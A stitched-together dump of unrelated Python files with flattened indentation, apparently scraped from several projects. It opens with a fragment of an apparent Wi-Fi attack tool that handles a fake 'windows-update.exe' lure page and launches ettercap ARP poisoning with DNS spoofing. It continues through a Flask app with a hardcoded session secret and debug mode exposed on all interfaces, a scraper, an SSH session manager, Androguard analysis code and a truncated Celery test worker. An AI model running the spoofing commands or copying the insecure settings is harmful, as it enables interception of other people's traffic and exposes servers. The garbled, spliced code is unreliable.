if path.isfile(directory+"index.html") and path.isfile(directory+"windows-update.exe"):
remove(directory+"windows-update.exe")
remove(directory+"index.html")
break
def ThreadDNS(self,interface):
self.logBox.addItem("[+] Start Attack all DNS.")
distro = linux_distribution()
if search("Kali Linux",distro[0]):
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof // //"""%(interface,interface)).read()) + "exit"
else:
n = (popen("""xterm -geometry 75x15-1+250 -T "DNS SPOOF Attack On %s" -e ettercap -T -Q -M arp -i %s -P dns_spoof """%(interface,interface)).read()) + "exit"
while n != "dsa":
if n == "exit":
#self.dns_status(False)
self.logBox.clear()
n = "dsa"
break
def getpath(self):
file = QFileDialog.getOpenFileName(self, 'Open Executable file',filter='*.exe')
if len(file) > 0:
self.path_file = file
self.path.setText(file)
def alt_etter(self,data):
configure = conf_etter(data)
file = open(self.path_file_etter, "w")
file.write(configure)
file.close()
def find(self,name, paths):
for root, dirs, files in walk(paths):
if name in files:
return path.join(root, name)
def getSize(self,filename):
st = stat(filename)
return st.st_size
|
app.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import sys, glob, os
sys.path.insert(0, glob.glob(os.path.abspath(os.path.dirname(__file__)) +
'/../../tools/thrift-0.9.3/lib/py/build/lib*')[0])
from controllers import *
from controllers.Parser import cmd_port
from flask import *
from threading import Thread
import logging
# Initialize the Flask app with the template folder address.
app = Flask(__name__, template_folder='templates')
# app.config.from_object('config')
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024 # 16 MB due to MongoDB
# Register the controllers.
app.register_blueprint(Main.main)
app.register_blueprint(User.user)
app.register_blueprint(Create.create)
app.register_blueprint(Learn.learn)
app.register_blueprint(Infer.infer)
# Session.
app.secret_key = 'A0Zr98j/3yX R~XHH!jmN]LWX/,?RT'
def flask_listener():
# For https (with ASR capability)
if os.environ.get('SECURE_HOST'):
print 'Starting secure flask'
app.run(host='0.0.0.0', port=3000, debug=True, use_reloader=False,
threaded=True, ssl_context=('certs/server.crt', 'certs/server.key'))
# For http (without ASR capability)
else:
print 'Starting non-secure flask'
app.run(host='0.0.0.0', port=3000, debug=True, use_reloader=False,
threaded=True)
def web_socket_listener():
print 'Start web socket at ' + str(cmd_port)
logging.basicConfig(level=logging.DEBUG,
format="%(levelname)8s %(asctime)s %(message)s ")
logging.debug('Starting up server')
WebSocket.tornado.options.parse_command_line()
# For wss (with ASR capability)
if os.environ.get('SECURE_HOST'):
print 'Starting secure web socket'
WebSocket.Application().listen(cmd_port, ssl_options={
"certfile":"certs/server.crt",
"keyfile":"certs/server.key"})
# For ws (without ASR capability)
else:
print 'Starting non-secure web socket'
WebSocket.Application().listen(cmd_port)
WebSocket.tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
Thread(target = flask_listener).start()
web_socket_listener()
|
fps.py
|
import time
import random
import threading
# Rough operations-per-second probe: every second a worker thread repeats a
# large integer exponentiation and counts iterations until the main thread
# raises the stop flag, then the count is printed.
while True:
    globals()['sec'] = 0
    globals()['count'] = 0
    def count_up():
        while globals()['sec'] != 1:
            21762138476832437 ** 31324  # busy work
            globals()['count'] += 1
    x = threading.Thread(target=count_up)
    x.start()
    time.sleep(1)
    globals()['sec'] = 1
    x.join()  # wait for the worker to see the stop flag before it gets reset
    print(globals()['count'])
|
run_graph_stats.py
|
import socket
from exec_utilities import time_out_util
from config import *
from exec_utilities.exec_utils import *
from multiprocessing import Process
def run_exp(env_tag=knl_tag, with_c_group=True, data_path_tag=graph_stat_exec_tag):
hostname = socket.gethostname()
with open('config.json') as ifs:
my_config_dict = json.load(ifs)[env_tag]
our_exec_path = my_config_dict[data_path_tag]
data_set_path = my_config_dict[data_set_path_tag]
data_set_lst = [
# "webgraph_eu",
# "webgraph_it",
# "webgraph_twitter"
# "s24-16",
# "s24-32",
# "ssca2-config-s17-c1000",
# "ssca2-config-s17-c10000"
# "snap_friendster"
"ssca-s17-c1k",
"ssca-s17-c2k",
"ssca-s17-c4k",
"ssca-s17-c6k",
"ssca-s17-c8k",
"ssca-s17-c10k",
"s22-16",
"s23-16",
"s24-16",
"s25-16",
"s26-16",
"s27-16"
]
# thread_num_lst = [1, 2, 4, 8, 16, 32, 40, 56]
thread_num_lst = [64] if env_tag is gpu24_tag else [40]
exp_res_root_name = 'exp_results'
folder_name = 'exp-2020-01-11-graph-stats' + os.sep + hostname
org_order_lst = ['org']
our_reorder_dict = {
'ustgpu2': org_order_lst,
'ustgpu1': org_order_lst,
'gpu23': org_order_lst,
'gpu24': org_order_lst
}
mc_brb = 'MC-BRB'
graph_stats = 'graph_stats'
our_exec_name_lst = [
mc_brb,
graph_stats
]
filtered_reorder_lst = our_reorder_dict[hostname]
work_dir = os.sep.join(['.', exp_res_root_name, folder_name])
os.system('mkdir -p ' + work_dir)
logger = get_logger(os.sep.join([work_dir, hostname + '.log']), name=__name__)
logger.info(my_splitter + time.ctime() + my_splitter)
logger.info('res folder: {}'.format(folder_name))
logger.info('our exec folder: {}'.format(our_exec_path))
logger.info('our exec name list: {}'.format(our_exec_name_lst))
logger.info('thread# lst: {}'.format(thread_num_lst))
logger.info('data set lst: {}'.format(data_set_lst))
logger.info('filtered_reorder_lst: {}'.format(filtered_reorder_lst))
def one_round():
for data_set_name in data_set_lst:
for reorder_method in filtered_reorder_lst:
for our_algorithm in our_exec_name_lst:
for t_num in thread_num_lst:
statistics_dir = os.sep.join(
map(str, ['.', exp_res_root_name, folder_name, data_set_name, reorder_method, t_num]))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'log']))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'dstat']))
os.system('mkdir -p ' + os.sep.join([statistics_dir, 'dstat_clean']))
statistics_file_path = statistics_dir + os.sep + our_algorithm + '.log'
dstat_file_path = os.sep.join([statistics_dir, 'dstat', our_algorithm + '-dstat.log'])
log_file_path = os.sep.join([statistics_dir, 'log', our_algorithm + '-raw.log'])
logger.info('stat file path: {}'.format(statistics_file_path))
# 1st: write header
append_header(statistics_file_path)
append_header(dstat_file_path)
append_header(log_file_path)
# 2nd: run exec cmd
algorithm_path = our_exec_path + os.sep + our_algorithm
if our_algorithm is mc_brb:
params_lst = map(str, ['cgexec -g memory:yche-exp' if with_c_group else '',
algorithm_path, 'MC-BRB', data_set_path + os.sep + data_set_name])
elif our_algorithm is graph_stats:
params_lst = map(str, ['cgexec -g memory:yche-exp' if with_c_group else '',
algorithm_path, '-i', data_set_path + os.sep + data_set_name,
'-l', statistics_file_path])
cmd = ' '.join(params_lst)
logger.info('exec-cmd: {}'.format(cmd))
time_out = 3600 * 2
my_env = os.environ.copy()
def execute_cmd(my_cmd):
logger.info('sub-process: {}'.format(my_cmd))
os.system(my_cmd)
# 3rd: spawn a new process to run the exec
dstat_cmd = 'dstat -tcdrlmgyn --fs >> ' + dstat_file_path
p = Process(target=execute_cmd, args=(dstat_cmd,))
p.start()
my_env['OMP_NUM_THREADS'] = str(t_num)
tle_flag, info, correct_info = time_out_util.run_with_timeout(cmd, timeout_sec=time_out,
env=my_env)
time_out_util.kill_term_recursive(p.pid)
modify_dstat_file(dstat_file_path)
# 4th: append outputs
write_split(statistics_file_path)
with open(statistics_file_path, 'a+') as ifs:
ifs.write(correct_info)
ifs.write('\nis_time_out:' + str(tle_flag))
ifs.write(my_splitter + time.ctime() + my_splitter)
ifs.write('\n\n\n\n')
if len(info) > 0:
with open(log_file_path, 'a+') as ofs:
ofs.write(info)
logger.info('finish: {}'.format(cmd))
for _ in range(1):
one_round()
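# --- Illustration (added; not part of the original script) ---
# run_exp() expects config.json to map an environment tag to the path entries
# read above, roughly like the sketch below. The literal key names come from
# the config module's *_tag constants, so the strings here are placeholders:
#
#   {
#       "knl": {
#           "<graph_stat_exec_tag>": "/path/to/compiled/binaries",
#           "<data_set_path_tag>": "/path/to/datasets"
#       }
#   }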
if __name__ == '__main__':
hostname = socket.gethostname()
if hostname.startswith('ustgpu2'):
run_exp(env_tag=ustgpu2_tag, with_c_group=False)
elif hostname.startswith('ustgpu1'):
run_exp(env_tag=ustgpu1_tag, with_c_group=False)
elif hostname.startswith('lccpu12'):
run_exp(env_tag=lccpu12_tag, with_c_group=False)
elif hostname.startswith('knl'):
run_exp(env_tag=knl_tag, with_c_group=False)
elif hostname.startswith('gpu24'):
run_exp(env_tag=gpu24_tag, with_c_group=False)
elif hostname.startswith('gpu23'):
run_exp(env_tag=gpu23_tag)
elif hostname.startswith('gpu'):
run_exp(env_tag=gpu_other_tag)
elif hostname.startswith('hnode'):
run_exp(env_tag=hnode_79_tag, with_c_group=False)
else:
# run_exp(env_tag=knl_tag, data_path_tag=exec_path_tag)
run_exp(env_tag=knl_tag, data_path_tag=exec_path_non_hbw_tag)
|
BackgroundWorker.py
|
#
# BackgroundWorker.py
#
# (c) 2020 by Andreas Kraft
# License: BSD 3-Clause License. See the LICENSE file for further details.
#
# This class implements a background process.
#
from Logging import Logging
import threading, time
class BackgroundWorker(object):
def __init__(self, updateIntervall, workerCallback):
self.workerUpdateIntervall = updateIntervall
self.workerCallback = workerCallback
self.doStop = True
self.workerThread = None
def start(self):
Logging.logDebug('Starting worker thread')
self.doStop = False
self.workerThread = threading.Thread(target=self.work)
self.workerThread.setDaemon(True) # Make the thread a daemon of the main thread
self.workerThread.start()
def stop(self):
Logging.log('Stopping worker thread')
# Stop the thread
self.doStop = True
        if self.workerThread is not None and self.workerThread is not threading.current_thread():
            # Joining the worker thread from within itself would raise RuntimeError,
            # so only wait when stop() is called from another thread.
            self.workerThread.join(self.workerUpdateIntervall + 5)  # wait a short time for the thread to terminate
            self.workerThread = None
def work(self):
while not self.doStop:
if self.workerCallback():
self.sleep()
else:
self.stop()
# self-made sleep. Helps in speed-up shutdown etc
divider = 5.0
def sleep(self):
for i in range(0, int(self.workerUpdateIntervall * self.divider)):
time.sleep(1.0 / self.divider)
if self.doStop:
break
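# --- Usage sketch (added for illustration; not part of the original module) ---
# Minimal example of driving the worker, assuming the project's Logging module
# is importable (it is already imported above). The callback returns True to
# keep the worker looping and False to make it stop itself.
if __name__ == '__main__':
    def _poll():
        print('tick')
        return True  # return False here to let the worker shut itself down
    worker = BackgroundWorker(updateIntervall=2, workerCallback=_poll)
    worker.start()
    time.sleep(6)  # let a few callback cycles run
    worker.stop()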
|
capes_scraper.py
|
import os
import sqlite3
import requests
import sys
import traceback
import shutil
from threading import Thread, Lock
from requests.exceptions import Timeout
from settings import DATABASE_PATH, HOME_DIR, MAX_RETRIES
from settings import CAPES_URL, CAPES_HTML_PATH
CAPES_HOST = 'cape.ucsd.edu'
CAPES_ACCEPT = 'html'
CAPES_USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36'
class CAPESScraper:
def __init__(self):
# Read all departments from the SQL database
self.database = sqlite3.connect(DATABASE_PATH)
self.cursor = self.database.cursor()
self.cursor.execute("SELECT DEPT_CODE FROM DEPARTMENT")
# fetching the data returns a tuple with one element,
# so using list comprehension to convert the data
self.departments = [i[0] for i in self.cursor.fetchall()]
# Boolean to signal that a thread has crashed
self.mutex = Lock()
self.crashed = False
# Create top level folder if it doesn't exist
if os.path.exists(CAPES_HTML_PATH):
shutil.rmtree(CAPES_HTML_PATH)
os.makedirs(CAPES_HTML_PATH)
# Thread-safe way of marking that at least one thread has crashed
def set_crashed(self):
self.mutex.acquire()
try:
self.crashed = True
finally:
self.mutex.release()
# Thread-safe way of checking if the program has crashed
def has_crashed(self):
local_crashed = False
self.mutex.acquire()
try:
local_crashed = self.crashed
finally:
self.mutex.release()
return local_crashed
def scrape(self):
print('Beginning CAPES scraping.')
self.iter_departments()
print('Finished CAPES scraping.')
def iter_departments(self):
# Number of threads is equivalent to the number of processors on the machine
pool = []
pool_size = os.cpu_count()
print("Initializing {} threads ...".format(pool_size))
# Allocate a pool of threads; each worker handles an equal subset of the work
for i in range(pool_size):
t = Thread(target=self.iter_departments_by_thread_handle_errors, args=[i, pool_size])
t.start()
pool.append(t)
# Block the main thread until each worker finishes
for t in pool:
t.join()
def iter_departments_by_thread_handle_errors(self, thread_id, num_threads):
# If a thread receives an error during execution, kill all threads & mark program as crashed
try:
self.iter_departments_by_thread(thread_id, num_threads)
except:
print("Error encountered by thread {}. Gracefully exiting ...".format(thread_id), file=sys.stderr)
traceback.print_exc(file=sys.stderr)
self.set_crashed()
def iter_departments_by_thread(self, thread_id, num_threads):
print("Thread {} is starting.".format(thread_id))
# Iterate through each department that the thread is assigned to
for counter in range(thread_id, len(self.departments), num_threads):
# Exit if any part of the scraper has crashed
if self.has_crashed():
print("Thread {} is exiting gracefully ...".format(thread_id), file=sys.stderr)
return
department = self.departments[counter]
# Construct the CAPES url for all courses in that department
url = CAPES_URL + department
url = url.rstrip()
# Make a request to the specific CAPES url
response = self.get_page_with_retries(url, thread_id)
# Store the requested HTML in the cache
self.store_page(department, response.text, thread_id)
print("Thread {} has finished the work assigned to it.".format(thread_id))
# Tries getting the given page {max_retries} number of times before quitting
def get_page_with_retries(self, page_url, thread_id):
retries = 0
max_retries = MAX_RETRIES
while True:
try:
response = requests.get(page_url, headers={
'Host': CAPES_HOST,
'Accept': CAPES_ACCEPT,
'User-Agent': CAPES_USER_AGENT
})
return response
except Timeout as timeout_exception:
retries += 1
print ("[T{0}] Failed to download page {1}.".format(thread_id, page_url))
if retries < max_retries:
print ("[T{0}] {1}/{2} attempts. Retrying ...".format(thread_id, retries, max_retries))
else:
print ("[T{0}] {1}/{2} attempts. All retries have been exhausted.".format(thread_id, retries, max_retries))
raise timeout_exception
# Tries to store the given page contents into a file in our cache
def store_page(self, department, page_contents, thread_id):
# Cache page content appropriately
with open(os.path.join(CAPES_HTML_PATH, department + '.html'), 'w') as f:
f.write(page_contents)
print('[T{0}] Saving'.format(thread_id), department, 'to', f.name, '...')
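# --- Usage sketch (added for illustration; not part of the original module) ---
# The scraper configures itself from settings.py, so a full run is one call:
# every department listed in the DEPARTMENT table is fetched from CAPES and
# cached as HTML under CAPES_HTML_PATH.
if __name__ == '__main__':
    CAPESScraper().scrape()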
|
ssh.py
|
import sys
import time
from threading import Lock, Thread
from random import randint
from netmiko import SSHDetect, ConnectHandler
import pprint
import os
from pathlib import Path
try:
local_dir = os.path.dirname(os.path.realpath(__file__))
except Exception:
local_dir = os.getcwd()
DEVICE_FILE_PATH = str(Path(local_dir,'setup_cfg', 'device_cfg.txt'))
def netmiko_attr(host, ssh_username, ssh_password, device_type='autodetect'):
return {
"device_type": device_type,
"host": host,
"username": ssh_username,
"password": ssh_password,
}
def _generate_session_id():
return int(randint(1, 9999))
def append_missing_ssh_thread_to_results(missing_list):
missing_dict = {}
for missing_device in missing_list:
missing_dict[missing_device] = 'No SSH Threader found'
return missing_dict
class SSHThreader:
def __init__(self, ssh_username, ssh_password):
self.ssh_username = ssh_username
self.ssh_password = ssh_password
self.session_pipeline = []
self.lock = Lock()
self.session_locked = False
self.main_controller_dict = {}
self.process_job = False
self.status_dict = {}
self.read_device_file()
self.flask_not_ok = False
if self.cfg_file_found:
self._create_status_dict()
print('SSH API Gateway is up, check status to confirm SSH sessions')
else:
print('SSH API Gateway is down, failed to load device file')
def _create_status_dict(self):
for device in self.device_list:
self.status_dict[device] = False
def read_device_file(self):
try:
with open(DEVICE_FILE_PATH, 'r') as f:
self.device_list = list(set([x.replace('\n', '') for x in f.readlines()[1:]]))
print(self.device_list)
self.cfg_file_found = True
except Exception:
self.device_list = []
self.cfg_file_found = False
finally:
self.ssh_server_active = False
def request_session(self):
with self.lock:
session_id = _generate_session_id()
self.session_pipeline.append(session_id)
if self.session_locked is False:
self.session_locked = True
return self.session_locked, session_id
else:
return False, session_id
def disable_ssh_server(self):
self.ssh_server_active = False
def enable_ssh_server(self):
if self.ssh_server_active is True:
return self.cfg_file_found
else:
self.ssh_server_active = True
return self.cfg_file_found
def check_session_status(self, session_id):
with self.lock:
if self.session_locked:
return self.session_locked
else:
if session_id != self.session_pipeline[0]:
return True
else:
return False
def session_clean_up(self, session_id):
with self.lock:
self.session_pipeline.remove(session_id)
self.session_locked = False
print(f'released session id {session_id}, session_lock is now set to {self.session_locked}')
def _apply_results_for_off_line_sessions(self):
"""confirms that all ssh sessions are ready and available based on the job keys (devices)
if a device is False, output and error results are applied since the SSH threader is offline"""
for device in self.job.keys():
if self.status_dict.get(device) is False:
self.job_errors.update({device: 'ssh session not established'})
self.result_dict = {**self.result_dict, **{device: 'SSH session is not established'}}
elif self.status_dict.get(device) is None:
self.job_errors.update({device: 'ssh session not started'})
def run_job(self, job):
self.job = job
wait_for_results = True
timer_not_exceeded = True
self.process_job = True
self.result_dict = {}
self.job_errors = {}
job_device_list = list(self.job.keys()).copy()
start = time.time()
devices_not_found_in_ssh_threader_list = [x for x in job_device_list if x not in self.device_list]
if len(devices_not_found_in_ssh_threader_list) > 0:
self.result_dict = append_missing_ssh_thread_to_results(devices_not_found_in_ssh_threader_list)
print(devices_not_found_in_ssh_threader_list)
self._apply_results_for_off_line_sessions()
while wait_for_results and timer_not_exceeded:
print(f'Devices which are currently reporting results are {self.result_dict.keys()}')
print(f'Looking for result output from {job_device_list}')
if set(self.result_dict.keys()) == set(job_device_list):
wait_for_results = False
print(self.result_dict)
print('all threads accounted for, terminating')
time.sleep(1)
if int(time.time() - start) > 15:
timer_not_exceeded = False
print('timer exceeded 15 secs')
self.result_dict.update({'errors': self.job_errors})
self.process_job = False
return self.result_dict
def start_threaders(self):
for device_id in self.device_list:
Thread(target=self._ssh_threaders, args=(device_id,)).start()
def _ssh_threaders(self, device_id):
ssh_session_ready = False
while self.ssh_server_active:
while ssh_session_ready is False:
print(f'\nstarting ssh session to {device_id}')
try:
guesser = SSHDetect(**netmiko_attr(device_id,
self.ssh_username,
self.ssh_password))
ssh_session = ConnectHandler(**netmiko_attr(device_id,
self.ssh_username,
self.ssh_password,
guesser.autodetect()))
prompt = ssh_session.find_prompt()
ssh_session_ready = True
print(f'\nSSH session {device_id} now established, now waiting for a job to arrive')
with self.lock:
self.status_dict.update({device_id: True})
print(self.status_dict)
ssh_base_timer = int(time.time())
except Exception as e:
print(e)
print(f'\nSSH session to {device_id} has failed, trying again in 30 seconds')
time.sleep(30)
self.status_dict.update({device_id: False})
if self.ssh_server_active is False:
break
if self.ssh_server_active is False:
self.status_dict.update({device_id: False})
break
if int(time.time()) - ssh_base_timer > 60:
try:
_ = ssh_session.find_prompt()
ssh_base_timer = int(time.time())
except Exception:
ssh_session_ready = False
pass
while self.process_job and ssh_session_ready:
try:
try:
_ = ssh_session.find_prompt()
except Exception:
ssh_session_ready = False
pass
if ssh_session_ready and self.job.get(device_id) is not None:
show_output: dict = {}
for command in self.job.get(device_id):
print(f'sending {command}')
try:
show_output.update({command: ssh_session.send_command(command,
expect_string=rf'{prompt}',
cmd_verify=False)})
except Exception:
show_output.update({command: 'failed to send'})
print(f'{device_id} returning success')
with self.lock:
self.result_dict = {**self.result_dict, **{device_id: show_output}}
self.job_errors.update({device_id: 'no error detected'})
self.job.pop(device_id)
time.sleep(1)
except Exception:
print(f'{device_id} trying to restart')
ssh_session_ready = False
else:
time.sleep(5)
try:
_ = ssh_session.find_prompt()
except Exception:
print(f'{device_id} trying to restart')
ssh_session_ready = False
self.status_dict.update({device_id: False})
else:
ssh_session.disconnect()
print(f'ssh disabled for {device_id}')
self.status_dict.update({device_id: False})
def ssh_server():
try:
device_cfg_file_found = ssh_threader.enable_ssh_server()
if device_cfg_file_found:
Thread(target=ssh_threader.start_threaders).start()
print('Threading Status')
pprint.pprint(ssh_threader.status_dict)
while True:
input_value = input('please select either start,status,stop or terminate: ')
if input_value == 'start':
device_cfg_file_found = ssh_threader.enable_ssh_server()
service_enabled = ssh_threader.ssh_server_active
if service_enabled and device_cfg_file_found:
Thread(target=ssh_threader.start_threaders).start()
print('Threading Status')
pprint.pprint(ssh_threader.status_dict)
else:
if service_enabled is False:
print('service is already enabled, please stop and restart')
if device_cfg_file_found is False:
print('device CFG is missing or has errors')
elif input_value == 'stop' or input_value == 'terminate':
ssh_threader.disable_ssh_server()
pprint.pprint(ssh_threader.status_dict)
time_now = int(time.time())
timer_expired = False
                while len([x for x in ssh_threader.status_dict if ssh_threader.status_dict.get(x) is True]) > 0 and \
                        not timer_expired:
time.sleep(1)
print('graceful shutdown in progress, please wait')
if int(time.time()) - time_now > 15:
timer_expired = True
else:
print('\ngraceful shutdown has completed\n')
if input_value == 'terminate':
print('terminating session')
sys.exit()
elif input_value == 'status':
pprint.pprint(ssh_threader.status_dict)
elif input_value == 'clear':
os.system('clear')
else:
print('ERROR with CFG File')
except KeyboardInterrupt:
ssh_threader.disable_ssh_server()
time_now = int(time.time())
timer_expired = False
        while len([x for x in ssh_threader.status_dict if ssh_threader.status_dict.get(x) is True]) > 0 and \
                not timer_expired:
time.sleep(1)
print('graceful shutdown in progress, please wait')
if int(time.time()) - time_now > 15:
timer_expired = True
else:
sys.exit()
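# --- Usage sketch (added for illustration; not part of the original module) ---
# run_job() takes a dict keyed by device hostname/IP with a list of show
# commands per device, and returns per-device output plus an 'errors' entry.
# The credentials and device address below are placeholders, and the sketch
# assumes a module-level ssh_threader instance as referenced by ssh_server():
#
#   ssh_threader = SSHThreader(ssh_username='admin', ssh_password='secret')
#   ssh_server()   # interactive loop: start / status / stop / terminate
#   results = ssh_threader.run_job({'10.0.0.1': ['show version']})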
|
auto.py
|
# This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import Queue
import threading
import time
import zlib
from androguard.core import androconf
from androguard.core.bytecodes import apk, dvm
from androguard.core.analysis import analysis
from androguard.core.androconf import debug
class AndroAuto(object):
"""
The main class which analyse automatically android apps by calling methods
from a specific object
:param settings: the settings of the analysis
:type settings: dict
"""
def __init__(self, settings):
self.settings = settings
def dump(self):
"""
Dump the analysis
"""
self.settings["my"].dump()
def dump_file(self, filename):
"""
Dump the analysis in a filename
"""
self.settings["my"].dump_file(filename)
def go(self):
"""
Launch the analysis
"""
myandro = self.settings["my"]
def worker(idx, q):
debug("Running worker-%d" % idx)
while True:
a, d, dx, axmlobj, arscobj = None, None, None, None, None
try:
filename, fileraw = q.get()
id_file = zlib.adler32(fileraw)
debug("(worker-%d) get %s %d" % (idx, filename, id_file))
log = self.settings["log"](id_file, filename)
is_analysis_dex, is_analysis_adex = True, True
debug("(worker-%d) filtering file %d" % (idx, id_file))
filter_file_ret, filter_file_type = myandro.filter_file(log, fileraw)
if filter_file_ret:
debug("(worker-%d) analysis %s" % (id_file, filter_file_type))
if filter_file_type == "APK":
a = myandro.create_apk(log, fileraw)
is_analysis_dex = myandro.analysis_apk(log, a)
fileraw = a.get_dex()
filter_file_type = androconf.is_android_raw(fileraw)
elif filter_file_type == "AXML":
axmlobj = myandro.create_axml(log, fileraw)
myandro.analysis_axml(log, axmlobj)
elif filter_file_type == "ARSC":
arscobj = myandro.create_arsc(log, fileraw)
myandro.analysis_arsc(log, arscobj)
if is_analysis_dex and filter_file_type == "DEX":
d = myandro.create_dex(log, fileraw)
is_analysis_adex = myandro.analysis_dex(log, d)
elif is_analysis_dex and filter_file_type == "DEY":
d = myandro.create_dey(log, fileraw)
is_analysis_adex = myandro.analysis_dey(log, d)
if is_analysis_adex and d:
dx = myandro.create_adex(log, d)
myandro.analysis_adex(log, dx)
myandro.analysis_app(log, a, d, dx)
myandro.finish(log)
except Exception, why:
myandro.crash(log, why)
myandro.finish(log)
del a, d, dx, axmlobj, arscobj
q.task_done()
q = Queue.Queue(self.settings["max_fetcher"])
for i in range(self.settings["max_fetcher"]):
t = threading.Thread(target=worker, args=[i, q])
t.daemon = True
t.start()
terminated = True
while terminated:
terminated = myandro.fetcher(q)
try:
if terminated:
time.sleep(10)
except KeyboardInterrupt:
terminated = False
q.join()
class DefaultAndroAnalysis(object):
"""
This class can be used as a template in order to analyse apps
"""
def fetcher(self, q):
"""
This method is called to fetch a new app in order to analyse it. The queue
        must be filled with the following format: (filename, raw)
:param q: the Queue to put new app
"""
pass
def filter_file(self, log, fileraw):
"""
        This method is called in order to filter a specific app
:param log: an object which corresponds to a unique app
:param fileraw: the raw app (a string)
        :rtype: a tuple of 2 elements: a boolean telling whether the analysis should
            continue, and the detected file type
"""
file_type = androconf.is_android_raw(fileraw)
if file_type == "APK" or file_type == "DEX" or file_type == "DEY" or file_type == "AXML" or file_type == "ARSC":
if file_type == "APK":
if androconf.is_valid_android_raw(fileraw):
return (True, "APK")
else:
return (True, file_type)
return (False, None)
def create_axml(self, log, fileraw):
"""
This method is called in order to create a new AXML object
:param log: an object which corresponds to a unique app
:param fileraw: the raw axml (a string)
        :rtype: an :class:`AXMLPrinter` object
"""
return apk.AXMLPrinter(fileraw)
def create_arsc(self, log, fileraw):
"""
This method is called in order to create a new ARSC object
:param log: an object which corresponds to a unique app
:param fileraw: the raw arsc (a string)
        :rtype: an :class:`ARSCParser` object
"""
return apk.ARSCParser(fileraw)
def create_apk(self, log, fileraw):
"""
This method is called in order to create a new APK object
:param log: an object which corresponds to a unique app
:param fileraw: the raw apk (a string)
:rtype: an :class:`APK` object
"""
return apk.APK(fileraw, raw=True, zipmodule=2)
def create_dex(self, log, dexraw):
"""
This method is called in order to create a DalvikVMFormat object
:param log: an object which corresponds to a unique app
:param dexraw: the raw classes.dex (a string)
:rtype: a :class:`DalvikVMFormat` object
"""
return dvm.DalvikVMFormat(dexraw)
def create_dey(self, log, deyraw):
"""
This method is called in order to create a DalvikOdexVMFormat object
:param log: an object which corresponds to a unique app
        :param deyraw: the raw odex file (a string)
:rtype: a :class:`DalvikOdexVMFormat` object
"""
return dvm.DalvikOdexVMFormat(deyraw)
def create_adex(self, log, dexobj):
"""
This method is called in order to create a VMAnalysis object
:param log: an object which corresponds to a unique app
:param dexobj: a :class:`DalvikVMFormat` object
        :rtype: a :class:`VMAnalysis` object
"""
return analysis.uVMAnalysis(dexobj)
def analysis_axml(self, log, axmlobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param axmlobj: a :class:`AXMLPrinter` object
:rtype: a boolean
"""
return True
def analysis_arsc(self, log, arscobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param arscobj: a :class:`ARSCParser` object
:rtype: a boolean
"""
return True
def analysis_apk(self, log, apkobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param apkobj: a :class:`APK` object
:rtype: a boolean
"""
return True
def analysis_dex(self, log, dexobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param dexobj: a :class:`DalvikVMFormat` object
:rtype: a boolean
"""
return True
def analysis_dey(self, log, deyobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param deyobj: a :class:`DalvikOdexVMFormat` object
:rtype: a boolean
"""
return True
def analysis_adex(self, log, adexobj):
"""
This method is called in order to know if the analysis must continue
:param log: an object which corresponds to a unique app
:param adexobj: a :class:`VMAnalysis` object
:rtype: a boolean
"""
return True
def analysis_app(self, log, apkobj, dexobj, adexobj):
"""
This method is called if you wish to analyse the final app
:param log: an object which corresponds to a unique app
:param apkobj: a :class:`APK` object
:param dexobj: a :class:`DalvikVMFormat` object
:param adexobj: a :class:`VMAnalysis` object
"""
pass
def finish(self, log):
"""
This method is called before the end of the analysis
:param log: an object which corresponds to a unique app
"""
pass
def crash(self, log, why):
"""
        This method is called if a crash happens
:param log: an object which corresponds to a unique app
:param why: the string exception
"""
pass
def dump(self):
"""
This method is called to dump the result
:param log: an object which corresponds to a unique app
"""
pass
def dump_file(self, filename):
"""
This method is called to dump the result in a file
:param log: an object which corresponds to a unique app
:param filename: the filename to dump the result
"""
pass
class DirectoryAndroAnalysis(DefaultAndroAnalysis):
"""
A simple class example to analyse a directory
"""
def __init__(self, directory):
self.directory = directory
def fetcher(self, q):
for root, dirs, files in os.walk(self.directory, followlinks=True):
if files != []:
for f in files:
real_filename = root
if real_filename[-1] != "/":
real_filename += "/"
real_filename += f
q.put((real_filename, open(real_filename, "rb").read()))
return False
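# --- Usage sketch (added for illustration; not part of the original module) ---
# go() reads three settings: "my" (the analysis object), "log" (a factory
# called with (id_file, filename) for every file) and "max_fetcher" (worker
# count). The log class below is a stand-in, not an Androguard API:
#
#   class SimpleLog(object):
#       def __init__(self, id_file, filename):
#           self.id_file, self.filename = id_file, filename
#
#   settings = {
#       "my": DirectoryAndroAnalysis("/path/to/apks"),
#       "log": SimpleLog,
#       "max_fetcher": 2,
#   }
#   AndroAuto(settings).go()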
|
worker.py
|
"""Embedded workers for integration tests."""
from __future__ import absolute_import, unicode_literals
import os
import threading
from contextlib import contextmanager
from celery import worker
from celery.result import _set_task_join_will_block, allow_join_result
from celery.utils.dispatch import Signal
from celery.utils.nodenames import anon_nodename
WORKER_LOGLEVEL = os.environ.get('WORKER_LOGLEVEL', 'error')
test_worker_starting = Signal(
name='test_worker_starting',
providing_args={},
)
test_worker_started = Signal(
name='test_worker_started',
providing_args={'worker', 'consumer'},
)
test_worker_stopped = Signal(
name='test_worker_stopped',
providing_args={'worker'},
)
class TestWorkController(worker.WorkController):
"""Worker that can synchronize on being fully started."""
